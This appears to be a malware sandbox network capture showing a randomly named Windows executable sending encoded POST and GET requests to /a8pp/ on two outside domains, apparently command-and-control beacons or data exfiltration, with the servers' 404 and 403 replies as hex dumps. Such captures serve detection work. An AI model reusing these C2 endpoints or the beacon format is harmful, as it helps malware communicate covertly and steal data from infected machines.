                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Jun 4, 2024 14:37:37.291742086 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                        Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                        Jun 4, 2024 14:37:37.291877985 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                        Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        46192.168.11.3049840162.240.81.18807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:39.808584929 CEST768OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.tintasmaiscor.com
                                        Origin: http://www.tintasmaiscor.com
                                        Referer: http://www.tintasmaiscor.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 31 4a 7a 57 64 62 61 2b 31 6a 47 61 64 58 51 6d 45 47 51 38 44 4e 58 51 67 41 36 47 43 4c 50 74 79 55 39 53 66 35 76 54 6a 47 56 50 66 6e 7a 65 78 6f 7a 4b 48 4a 53 68 50 56 4c 7a 38 73 57 53 33 70 55 2f 52 4c 48 37 6d 44 67 32 33 30 4d 70 51 42 34 67 70 30 48 4e 61 72 6c 75 72 36 6c 73 55 37 58 30 6d 45 72 69 52 32 70 63 45 67 70 61 45 6f 6a 6e 46 39 4e 54 4f 73 35 59 70 53 47 52 31 38 2f 36 45 37 2f 66 59 32 6a 53 6a 4b 50 2b 74 68 51 68 4c 6a 55 44 54 69 54 33 42 79 50 44 7a 53 74 58 6e 46 70 64 75 33 65 56 6d 45 6b 31 49 2b 6b 44 76 55 6e 4b 4b 34 47 6f 30 64 63 7a 38 37 73 4d 6a 58 52 4f 6d 66 58 63 4f 31 76 48 79 4d 4a 4a 51 37 77 3d
                                        Data Ascii: 2NlhHLS8=1JzWdba+1jGadXQmEGQ8DNXQgA6GCLPtyU9Sf5vTjGVPfnzexozKHJShPVLz8sWS3pU/RLH7mDg230MpQB4gp0HNarlur6lsU7X0mEriR2pcEgpaEojnF9NTOs5YpSGR18/6E7/fY2jSjKP+thQhLjUDTiT3ByPDzStXnFpdu3eVmEk1I+kDvUnKK4Go0dcz87sMjXROmfXcO1vHyMJJQ7w=
                                        Jun 4, 2024 14:37:39.975148916 CEST1289INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 04 Jun 2024 12:37:39 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "636d2d22-e42"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Jun 4, 2024 14:37:39.975162983 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                        Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                        Jun 4, 2024 14:37:39.975266933 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                        Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        47192.168.11.3049841162.240.81.18807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:42.517452955 CEST1685OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.tintasmaiscor.com
                                        Origin: http://www.tintasmaiscor.com
                                        Referer: http://www.tintasmaiscor.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 31 4a 7a 57 64 62 61 2b 31 6a 47 61 64 58 51 6d 45 47 51 38 44 4e 58 51 67 41 36 47 43 4c 50 74 79 55 39 53 66 35 76 54 6a 47 4e 50 66 55 37 65 32 37 62 4b 45 4a 53 68 47 31 4c 75 38 73 57 62 33 70 63 37 52 4f 66 72 6d 47 6b 32 32 58 55 70 57 77 34 67 6a 30 48 4e 54 4c 6b 70 32 4b 6c 35 55 37 48 77 6d 45 37 69 52 32 70 63 45 68 5a 61 44 35 6a 6e 44 39 4e 63 59 38 35 71 6a 79 47 31 31 39 57 50 45 37 37 50 66 46 37 53 69 71 66 2b 76 54 34 68 48 6a 55 4e 57 69 54 76 42 79 53 62 7a 53 5a 6c 6e 46 63 4b 75 77 79 56 33 6a 68 32 62 4b 6f 75 79 30 58 54 4b 63 47 6e 2f 37 59 47 69 36 41 6f 6c 6c 46 52 78 4d 58 68 58 69 7a 41 70 75 4a 30 4c 74 78 44 46 53 37 72 69 63 38 68 2b 36 4c 64 50 48 74 30 62 50 66 46 37 6b 6f 72 5a 39 4a 50 56 6a 62 37 52 69 6b 4e 34 71 76 58 78 42 69 7a 70 30 61 4a 46 44 73 38 77 58 76 53 63 64 43 69 31 63 73 54 4a 68 50 52 6d 53 58 47 5a 53 71 58 4e 42 32 62 39 7a 4d 6b 72 49 52 68 51 79 31 6f 44 52 7a 50 64 4f 56 66 45 5a 36 67 6a 69 57 76 55 49 33 48 68 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=1JzWdba+1jGadXQmEGQ8DNXQgA6GCLPtyU9Sf5vTjGNPfU7e27bKEJShG1Lu8sWb3pc7ROfrmGk22XUpWw4gj0HNTLkp2Kl5U7HwmE7iR2pcEhZaD5jnD9NcY85qjyG119WPE77PfF7Siqf+vT4hHjUNWiTvBySbzSZlnFcKuwyV3jh2bKouy0XTKcGn/7YGi6AollFRxMXhXizApuJ0LtxDFS7ric8h+6LdPHt0bPfF7korZ9JPVjb7RikN4qvXxBizp0aJFDs8wXvScdCi1csTJhPRmSXGZSqXNB2b9zMkrIRhQy1oDRzPdOVfEZ6gjiWvUI3HhJaOm7Cxgx7ruCEhox3UEN3lwccYIhNSsE7S2hrUQMnp+tmuPhQUNtL37SDrDtFrYXN1oYQytl6Wo48M0HZ9W97o0LiFzAJ9v0zS0HG7Zpwoa6tFK6rpm2ag8gC03UqLU6ruY4+7SOgbHfwQfg9RZ9k6iSGZYB2F1PNx+uKxcYHsq+moD94jrOYDEruXfL7+ioSp2bLcq693SkQxXZgy0kHjrmB9rfZLyucdR+JItDe/iOC7yYxjvLSFgOOWCs+Qj47+Bbjp7geSjZQJyL/9+kGQeZTA2qwAyoy7hZ1TUGaaB8WSriQUCrTxdwaqXdp9Df/0UbzucOrTOChYi48SSrF5u++OjB9oi/OrpaL+uVfEyApUwqdiSTBxgwCyHZcpxB/8Ve03/zdmbF9CoPghbTetoKoxAdbBZv/Rl0/UsqrUzy/mL75qjTJbQaLr+J21kAwZjtiAM69K5xU9XrhQS/YVTgHhHTqnPogcoiUE1ov4FOdHpSEfaDFV63QtmVU/BaNemqlWAqe8Q4NYudgYQPCOd78kcMzP9DTb6ARaLkz8XLBepck2fNRB9FkB5H1+Yq6rM8jPoHvqpdhYW2iSr4430NAIo7JLwvhB1yAvDkCgT/dBYT0PCG+Zz2I/cmkbS/L76h5iFiFKGC7iLIhjUtd6yrIBC/uazgg [TRUNCATED]
                                        Jun 4, 2024 14:37:42.690855026 CEST1289INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 04 Jun 2024 12:37:42 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "636d2d22-e42"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Jun 4, 2024 14:37:42.690869093 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                        Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                        Jun 4, 2024 14:37:42.690972090 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                        Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        48192.168.11.3049842162.240.81.18807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:45.221573114 CEST471OUTGET /a8pp/?2NlhHLS8=4Lb2evqbqWm/eQEsCRZbIPf+4WOFbtHQ6zBEferLjExJaXLZsL3GLbWlHTrS18+QwpI6CqjMoX8o4lQjVBd1hnajfrB87pxWL6PWkXnwG2oHKjYPIKLzKN0=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.tintasmaiscor.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:37:45.394918919 CEST1289INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 04 Jun 2024 12:37:45 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "636d2d22-e42"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Jun 4, 2024 14:37:45.394933939 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                        Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                        Jun 4, 2024 14:37:45.395042896 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                        Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        49192.168.11.3049843192.207.62.21807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:52.571449995 CEST730OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 44 4b 79 2f 69 6d 6c 4b 43 51 71 57 6f 51 36 66 32 73 69 62 53 35 59 54 70 73 4a 34 61 77 39 75 32 62 63 6c 37 36 4e 75 57 6c 52 51 2f 6a 2f 65 45 51 6c 51 52 6c 43 4c 53 61 75 79 4e 77 36 69 4f 2b 72 55 6a 46 75 4e 30 31 70 74 72 41 43 30 75 44 69 41 75 2b 71 37 51 6e 7a 48 5a 38 64 61 70 68 38 49 69 4c 57 6e 72 54 2b 55 61 49 4e 70 75 72 4b 64 50 61 37 77 6e 67 47 67 2b 30 37 52 72 6c 33 36 31 72 54 77 2f 37 62 74 43 33 64 4d 43 30 6e 42 65 55 4a 52 37 68 38 63 71 46 72 6f 74 41 4a 53 41 4a 6e 32 30 4b 4f 6b 30 49 79 46 61 71 59 38 71 42 50 54 5a 67 61 59 7a 41 39 4d 44 51 3d 3d
                                        Data Ascii: 2NlhHLS8=DKy/imlKCQqWoQ6f2sibS5YTpsJ4aw9u2bcl76NuWlRQ/j/eEQlQRlCLSauyNw6iO+rUjFuN01ptrAC0uDiAu+q7QnzHZ8daph8IiLWnrT+UaINpurKdPa7wngGg+07Rrl361rTw/7btC3dMC0nBeUJR7h8cqFrotAJSAJn20KOk0IyFaqY8qBPTZgaYzA9MDQ==
                                        Jun 4, 2024 14:37:52.743582010 CEST1176INHTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:37:52 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip
                                        Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 [TRUNCATED]
                                        Data Ascii: 3aeuT[oG~t{zmTBRSj8ZH(4A%j.hCF2TCZaw}X#,Pg+ hT&1DluG{=i8d}o9o W+u6m+rc}ebHeo,M {QhQ{<L"%cWXNBCm+`Txf`4 1\x*u^%qXK0d^0/V@"OuHa`:&L(LEzdDOZ}TCqB#sfd?85D*dP+U#XUnMOO]@kUN}x7"[=rWcse2}G."t-|25e]impb[r#f rGNqg05K1z}X"qphef7Gt^NW?Oz;{}:?Gk+F.v?NT]jtEv~ntr5HVFTkGoa};7}xG/7`=H[TV2!91Qw3nOM9SpI7b$?=6]_9Snvom?s:ZM+R*+?6gc&MW#Bk(A@8g) ^/\>U#W5CoUrBb>diNp}mmp=&xB:60


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        50192.168.11.3049844192.207.62.21807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:55.275408983 CEST750OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 44 4b 79 2f 69 6d 6c 4b 43 51 71 57 36 67 4b 66 36 76 61 62 55 5a 59 51 30 63 4a 34 55 51 39 71 32 61 67 6c 37 37 34 72 57 57 6c 51 2f 43 50 65 57 55 52 51 57 6c 43 4c 4b 71 75 4e 44 51 37 73 4f 2b 58 32 6a 45 53 4e 30 31 56 74 72 45 4b 30 74 79 69 50 68 4f 71 31 66 48 7a 5a 47 73 64 61 70 68 38 49 69 4b 6e 43 72 53 57 55 5a 39 46 70 76 4b 4b 63 42 36 37 7a 76 41 47 67 36 30 36 57 72 6c 33 49 31 76 54 61 2f 35 6a 74 43 32 42 4d 46 6c 6e 4f 48 45 4a 58 6d 78 39 4d 75 46 4b 53 74 77 35 51 4d 65 61 74 7a 76 43 59 78 66 44 66 48 70 73 2b 35 68 7a 2b 46 68 33 77 78 43 38 58 65 53 58 2b 69 69 2f 58 49 48 66 51 42 36 32 4b 36 4f 72 6c 62 72 34 3d
